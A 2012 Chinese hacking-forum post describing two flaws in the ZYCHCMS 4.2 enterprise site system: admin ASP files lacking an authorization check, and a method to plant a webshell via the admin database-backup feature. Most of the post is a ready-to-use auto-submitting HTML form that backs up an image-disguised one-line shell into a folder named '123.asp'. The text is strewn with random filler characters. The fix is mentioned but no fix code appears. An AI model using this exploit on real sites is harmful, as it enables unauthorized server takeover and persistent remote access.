找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1807|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
* |# ^' S" a& }  [" `) e2 S, e' |( `
  a# Q6 p9 ~+ k% Y' ~! y: f

6 B: m7 L" g& |6 v3 ~9 h3 @! \- G% ~, \
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)6 E4 I* R- C4 Q) b" X4 C# P
①SQL注射漏洞
2 p, B4 g/ @( q/ R 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
/ ]" B. Q. m$ r$ _* R( g- o* A 漏洞原因:未过滤- {) D' q' m6 U1 R
漏洞代码:5 H2 t* z( O  u, K4 d- u6 T) ?' Y6 O" X
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
2 q( P" h. ]3 P0 X6 k6 q7 k7 K 修复方法:在文件开头加入代码. o* Z( S7 i# \, q( i) V6 {* L

' F, c) f+ N" J( @! Z
( R  {" G1 Z$ k  O* {②后台拿WBSHELL
. n$ O# d4 `+ i- i 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。& ]) X. Q/ C8 W7 e/ v5 X$ f
这里在网上找了一个,改了下,将就着用。
! r0 @  n  L9 v/ x- l. A 以下是代码本地提交代码1 j# ^: W2 G" X0 C

! Y- R9 s, z! c0 f2 e1 x
5 K1 t' E8 A7 j5 x, _  g<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>3 Q' E: h4 x& \, v
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
% N8 r1 h3 Z  C <tr>7 J! G* `9 G  C( o! V8 `3 i
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>) K' C  Q% B3 u
</tr>
  n# P  [5 x+ l: a4 S+ m7 j2 ^1 [ <tr>
0 z. i. s& h: h0 H$ v5 x; h <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
' V: z, C# o" ?& {# V </span>
9 o$ t+ Y* ], o1 Q) G# V <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >- o$ j2 F# m* ?! R8 N) s2 M
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >) |1 d4 i( _8 ?& v8 o
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>* G+ Z4 Y! ^* \$ l- Z: d
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d# e0 [. d' v  j- e
<div align=”left”>
2 u% A$ e: H1 U% q1 {% F5 O <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />9 S8 Y* P# I; S) K! j6 ]/ u
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>$ [  a1 e: Z: E& M6 I( {
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />. d- m' O+ v1 x
</div></td>7 Y$ \% X/ ~6 l; b; S/ c
</tr>
3 K$ F5 u: V" S& T* n6 y <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>0 \/ L# |2 |' j! b4 Z* q
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
) h# S5 W2 b0 U* @ <td class=”td”><div align=”left”>0 i! F% p: t6 T# X
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />$ f: G: j; |0 h, c# D
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
3 W* S( ^# o7 s1 W3 Y. v0 v </tr>5 `6 ]5 B6 t" s) x* N6 R* F- D3 Y- e
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
7 y% x4 d% q$ f9 Z  p" |: I <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>5 G3 S+ y) o. V6 N4 b4 j' ~
<td class=”td”><div align=”left”>
6 g( T" E  K7 P4 M+ `. @; G' C <input type=”submit” value=”确定备份” class=”btn”
% Z: _9 S4 ]- _0 y+ m+ r </div></td>
9 A& B$ B4 M/ y/ ?3 D </tr>
! [! _8 x1 c4 {9 a1 L </table></td></tr></form>
7 ^' P6 o3 V* J) Z  g. ^$ U </table>5 h" ^4 ^8 U; _7 x. J
</td>
1 I3 l) Y: y7 u4 Q1 I" Q% e </tr>
% Y/ N% O: H8 A, d* N% C </table># ^5 b" K& G9 N8 i+ f
<script>
+ g$ Z% @9 r! I5 M, Y& c document.all.add.submit();
0 x' G$ P$ _" U) H$ X1 ^; z </script>
8 O) O7 V$ i3 v9 r
5 r5 F9 P9 B- W+ o9 e. N: \" K3 a; g$ n, L
2 L1 `  Z- N) ]; v7 T
! J$ y6 c/ }& w& f

# z2 \7 q) j7 i! y: w
- j7 R3 ?- d9 ^2 W* O/ v! D& v; j7 T3 d0 [8 R$ r7 Q
6 w( C# ]/ v* o

" n" U+ O& y+ \5 S) L' u" x6 }: V( k5 q7 W; ~) [
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表